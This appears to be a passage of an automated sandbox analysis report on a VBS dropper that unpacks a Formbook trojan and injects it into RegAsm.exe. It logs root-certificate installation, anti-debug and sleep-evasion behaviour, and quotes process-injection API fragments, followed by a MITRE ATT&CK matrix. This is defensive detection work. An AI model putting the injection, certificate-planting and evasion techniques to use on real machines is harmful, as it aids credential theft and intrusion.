          Source: 00000003.00000002.455450302.0000000000270000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: temp_executable.exe.0.dr, DyyVDbaRvM1YfIq9il.csCryptographic APIs: 'CreateDecryptor'
          Source: temp_executable.exe.0.dr, DyyVDbaRvM1YfIq9il.csCryptographic APIs: 'CreateDecryptor'
          Source: temp_executable.exe.0.dr, DyyVDbaRvM1YfIq9il.csCryptographic APIs: 'CreateDecryptor'
          Source: temp_executable.exe.0.dr, AesHelper.csCryptographic APIs: 'CreateDecryptor'
          Source: 0.3.wscript.exe.3ee4a70.0.raw.unpack, DyyVDbaRvM1YfIq9il.csCryptographic APIs: 'CreateDecryptor'
          Source: 0.3.wscript.exe.3ee4a70.0.raw.unpack, DyyVDbaRvM1YfIq9il.csCryptographic APIs: 'CreateDecryptor'
          Source: 0.3.wscript.exe.3ee4a70.0.raw.unpack, DyyVDbaRvM1YfIq9il.csCryptographic APIs: 'CreateDecryptor'
          Source: 0.3.wscript.exe.3ee4a70.0.raw.unpack, AesHelper.csCryptographic APIs: 'CreateDecryptor'
          Source: 0.3.wscript.exe.4446a90.2.raw.unpack, DyyVDbaRvM1YfIq9il.csCryptographic APIs: 'CreateDecryptor'
          Source: 0.3.wscript.exe.4446a90.2.raw.unpack, DyyVDbaRvM1YfIq9il.csCryptographic APIs: 'CreateDecryptor'
          Source: 0.3.wscript.exe.4446a90.2.raw.unpack, DyyVDbaRvM1YfIq9il.csCryptographic APIs: 'CreateDecryptor'
          Source: classification engineClassification label: mal100.troj.expl.evad.winVBS@5/1@1/1
          Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeMutant created: NULL
          Source: C:\Windows\System32\wscript.exeFile created: C:\Users\user\AppData\Local\Temp\temp_executable.exeJump to behavior
          Source: unknownProcess created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\KjFT0qPTo4.vbs"
          Source: C:\Windows\System32\wscript.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
          Source: C:\Windows\System32\wscript.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: unknownProcess created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\KjFT0qPTo4.vbs"
          Source: C:\Windows\System32\wscript.exeProcess created: C:\Users\user\AppData\Local\Temp\temp_executable.exe "C:\Users\user\AppData\Local\Temp\temp_executable.exe"
          Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
          Source: C:\Windows\System32\wscript.exeProcess created: C:\Users\user\AppData\Local\Temp\temp_executable.exe "C:\Users\user\AppData\Local\Temp\temp_executable.exe" Jump to behavior
          Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"Jump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: version.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: sxs.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: dwmapi.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: cryptsp.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: msisip.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: bcrypt.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: rpcrtremote.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: msdart.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: mpr.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: propsys.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: ntmarta.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: apphelp.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: secur32.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeSection loaded: wow64win.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeSection loaded: wow64cpu.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeSection loaded: version.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeSection loaded: bcrypt.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeSection loaded: cryptsp.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeSection loaded: rasapi32.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeSection loaded: rasman.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeSection loaded: rtutils.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeSection loaded: winhttp.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeSection loaded: webio.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeSection loaded: credssp.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeSection loaded: iphlpapi.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeSection loaded: winnsi.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeSection loaded: dhcpcsvc6.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeSection loaded: dhcpcsvc.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeSection loaded: dnsapi.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeSection loaded: rasadhlp.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeSection loaded: secur32.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeSection loaded: ncrypt.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeSection loaded: gpapi.dllJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: wow64win.dllJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: wow64cpu.dllJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: uxtheme.dllJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: winmm.dllJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: samcli.dllJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: msacm32.dllJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: version.dllJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: sfc.dllJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: sfc_os.dllJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: dwmapi.dllJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: mpr.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B54F3741-5B07-11CF-A4B0-00AA004A55E8}\InprocServer32Jump to behavior
          Source: Binary string: VCBJER234.pdb source: wscript.exe, 00000000.00000003.371603253.0000000003ED3000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.371785671.000000000476B000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.371651218.0000000003BCE000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.371908468.0000000004410000.00000004.00000020.00020000.00000000.sdmp, temp_executable.exe, 00000002.00000000.364263905.00000000012F2000.00000020.00000001.01000000.00000006.sdmp, temp_executable.exe.0.dr
          Source: Binary string: wntdll.pdb source: RegAsm.exe, RegAsm.exe, 00000003.00000002.455555321.00000000022E0000.00000040.00001000.00020000.00000000.sdmp

          Data Obfuscation

          barindex
          Source: temp_executable.exe.0.dr, DyyVDbaRvM1YfIq9il.cs.Net Code: Type.GetTypeFromHandle(KKr6hZkjvwWjdm9A4Z.XHncqS7IVGrlk(16777263)).GetMethod("GetDelegateForFunctionPointer", new Type[2]{Type.GetTypeFromHandle(KKr6hZkjvwWjdm9A4Z.XHncqS7IVGrlk(16777264)),Type.GetTypeFromHandle(KKr6hZkjvwWjdm9A4Z.XHncqS7IVGrlk(16777245))})
          Source: 0.3.wscript.exe.3ee4a70.0.raw.unpack, DyyVDbaRvM1YfIq9il.cs.Net Code: Type.GetTypeFromHandle(KKr6hZkjvwWjdm9A4Z.XHncqS7IVGrlk(16777263)).GetMethod("GetDelegateForFunctionPointer", new Type[2]{Type.GetTypeFromHandle(KKr6hZkjvwWjdm9A4Z.XHncqS7IVGrlk(16777264)),Type.GetTypeFromHandle(KKr6hZkjvwWjdm9A4Z.XHncqS7IVGrlk(16777245))})
          Source: 0.3.wscript.exe.4446a90.2.raw.unpack, DyyVDbaRvM1YfIq9il.cs.Net Code: Type.GetTypeFromHandle(KKr6hZkjvwWjdm9A4Z.XHncqS7IVGrlk(16777263)).GetMethod("GetDelegateForFunctionPointer", new Type[2]{Type.GetTypeFromHandle(KKr6hZkjvwWjdm9A4Z.XHncqS7IVGrlk(16777264)),Type.GetTypeFromHandle(KKr6hZkjvwWjdm9A4Z.XHncqS7IVGrlk(16777245))})
          Source: temp_executable.exe.0.drStatic PE information: 0xB915B30D [Fri May 25 21:30:53 2068 UTC]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_004030E0 push eax; ret 3_2_004030E2
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_0041488D pushfd ; iretd 3_2_0041488F
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_00401966 push esi; iretd 3_2_00401967
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_00402179 push ss; retf 3_2_0040213D
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_00415AE7 pushad ; ret 3_2_00415AE9
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_0040D4C7 push edx; ret 3_2_0040D514
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_0040D4CD push edx; ret 3_2_0040D514
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_004154B9 push edi; retf 3_2_004154BA
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_00418DD0 push ebp; ret 3_2_00418DE6
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_0040D589 push edx; ret 3_2_0040D514
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_004116BB push edi; retf 3_2_004116BC
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_00413FC3 push edi; ret 3_2_00413FCE
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_022FDFA1 push ecx; ret 3_2_022FDFB4
          Source: temp_executable.exe.0.dr, DyyVDbaRvM1YfIq9il.csHigh entropy of concatenated method names: 'D4r4O0AxSI', 'CwecqSo7Q1xXT', 'creoiNvd7', 'jZiU8kt7k', 'yIEeUuogE', 'HNMMnrD0K', 'U6ZIpjiMV', 'TYIaeXNeW', 'rI3lmZ9FL', 'SuhhReBcy'
          Source: temp_executable.exe.0.dr, R2mIapWar4cwoqqx6Q.csHigh entropy of concatenated method names: 'IWZ4FNxMCV', 'X4o4BaXNNW', 'ReR4PkWY9i', 'XZO4yOqtpA', 'pcT48wm9UY', 'Y9l4jroko9', 'OY84tBcMwd', 'JrQ4qkE5mX', 'iRM4R10ean', 'AGe45CEX5X'
          Source: 0.3.wscript.exe.3ee4a70.0.raw.unpack, DyyVDbaRvM1YfIq9il.csHigh entropy of concatenated method names: 'D4r4O0AxSI', 'CwecqSo7Q1xXT', 'creoiNvd7', 'jZiU8kt7k', 'yIEeUuogE', 'HNMMnrD0K', 'U6ZIpjiMV', 'TYIaeXNeW', 'rI3lmZ9FL', 'SuhhReBcy'
          Source: 0.3.wscript.exe.3ee4a70.0.raw.unpack, R2mIapWar4cwoqqx6Q.csHigh entropy of concatenated method names: 'IWZ4FNxMCV', 'X4o4BaXNNW', 'ReR4PkWY9i', 'XZO4yOqtpA', 'pcT48wm9UY', 'Y9l4jroko9', 'OY84tBcMwd', 'JrQ4qkE5mX', 'iRM4R10ean', 'AGe45CEX5X'
          Source: 0.3.wscript.exe.4446a90.2.raw.unpack, DyyVDbaRvM1YfIq9il.csHigh entropy of concatenated method names: 'D4r4O0AxSI', 'CwecqSo7Q1xXT', 'creoiNvd7', 'jZiU8kt7k', 'yIEeUuogE', 'HNMMnrD0K', 'U6ZIpjiMV', 'TYIaeXNeW', 'rI3lmZ9FL', 'SuhhReBcy'
          Source: 0.3.wscript.exe.4446a90.2.raw.unpack, R2mIapWar4cwoqqx6Q.csHigh entropy of concatenated method names: 'IWZ4FNxMCV', 'X4o4BaXNNW', 'ReR4PkWY9i', 'XZO4yOqtpA', 'pcT48wm9UY', 'Y9l4jroko9', 'OY84tBcMwd', 'JrQ4qkE5mX', 'iRM4R10ean', 'AGe45CEX5X'

          Persistence and Installation Behavior

          barindex
          Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeRegistry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 BlobJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeRegistry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\12891DF7B048CD69D0196C8AD7A754C8A812A08C BlobJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeRegistry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 BlobJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeRegistry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 BlobJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeRegistry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 BlobJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeRegistry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 BlobJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeRegistry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\12891DF7B048CD69D0196C8AD7A754C8A812A08C BlobJump to behavior
          Source: C:\Windows\System32\wscript.exeFile created: C:\Users\user\AppData\Local\Temp\temp_executable.exeJump to dropped file
          Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOTJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 BlobJump to behavior
          Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeMemory allocated: 2C0000 memory reserve | memory write watchJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeMemory allocated: 2710000 memory reserve | memory write watchJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeMemory allocated: 3C0000 memory reserve | memory write watchJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_02340101 rdtsc 3_2_02340101
          Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeThread delayed: delay time: 922337203685477Jump to behavior
          Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-TimerJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeWindow / User API: threadDelayed 495Jump to behavior
          Source: C:\Windows\System32\wscript.exe TID: 3300Thread sleep time: -60000s >= -30000sJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe TID: 3364Thread sleep count: 495 > 30Jump to behavior
          Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe TID: 3328Thread sleep time: -922337203685477s >= -30000sJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 3400Thread sleep time: -30000s >= -30000sJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeThread delayed: delay time: 922337203685477Jump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information queried: ProcessInformationJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess queried: DebugPortJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_02340101 rdtsc 3_2_02340101
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_022F07AC NtCreateMutant,LdrInitializeThunk,3_2_022F07AC
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_023026F8 mov eax, dword ptr fs:[00000030h]3_2_023026F8
          Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeProcess token adjusted: DebugJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeMemory allocated: page read and write | page guardJump to behavior

          HIPS / PFW / Operating System Protection Evasion

          barindex
          Source: C:\Windows\System32\wscript.exeFile created: temp_executable.exe.0.drJump to dropped file
          Source: temp_executable.exe.0.dr, ProcessExecutor.csReference to suspicious API methods: App.ReadProcessMemory(Settings.pi.ProcessHandle, num3 + 8, ref buffer, 4, ref bytesRead)
          Source: temp_executable.exe.0.dr, ProcessExecutor.csReference to suspicious API methods: App.VirtualAllocEx(Settings.pi.ProcessHandle, num2, length, 12288, 64)
          Source: temp_executable.exe.0.dr, ProcessExecutor.csReference to suspicious API methods: App.WriteProcessMemory(Settings.pi.ProcessHandle, num4, payload, bufferSize, ref bytesRead)
          Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeMemory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 protect: page execute and read and writeJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 value starts with: 4D5AJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000Jump to behavior
          Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 401000Jump to behavior
          Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 7EFDE008Jump to behavior
          Source: C:\Windows\System32\wscript.exeProcess created: C:\Users\user\AppData\Local\Temp\temp_executable.exe "C:\Users\user\AppData\Local\Temp\temp_executable.exe" Jump to behavior
          Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"Jump to behavior
          Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeQueries volume information: C:\Users\user\AppData\Local\Temp\temp_executable.exe VolumeInformationJump to behavior
          Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

          Stealing of Sensitive Information

          barindex
          Source: Yara matchFile source: 3.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 3.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000003.00000002.455484382.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000002.455450302.0000000000270000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY

          Remote Access Functionality

          barindex
          Source: Yara matchFile source: 3.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 3.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000003.00000002.455484382.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000002.455450302.0000000000270000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
          ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
          Gather Victim Identity Information121
          Scripting
          Valid Accounts1
          Native API
          121
          Scripting
          1
          DLL Side-Loading
          1
          Disable or Modify Tools
          OS Credential Dumping1
          File and Directory Discovery
          Remote Services11
          Archive Collected Data
          1
          Ingress Tool Transfer
          Exfiltration Over Other Network MediumAbuse Accessibility Features
          CredentialsDomainsDefault Accounts2
          Exploitation for Client Execution
          1
          DLL Side-Loading
          311
          Process Injection
          11
          Deobfuscate/Decode Files or Information
          LSASS Memory12
          System Information Discovery
          Remote Desktop ProtocolData from Removable Media11
          Encrypted Channel
          Exfiltration Over BluetoothNetwork Denial of Service
          Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)3
          Obfuscated Files or Information
          Security Account Manager1
          Query Registry
          SMB/Windows Admin SharesData from Network Shared Drive2
          Non-Application Layer Protocol
          Automated ExfiltrationData Encrypted for Impact
          Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
          Install Root Certificate
          NTDS2
          Security Software Discovery
          Distributed Component Object ModelInput Capture3
          Application Layer Protocol
          Traffic DuplicationData Destruction
          Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
          Software Packing
          LSA Secrets1
          Process Discovery
          SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
          Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
          Timestomp
          Cached Domain Credentials41
          Virtualization/Sandbox Evasion
          VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
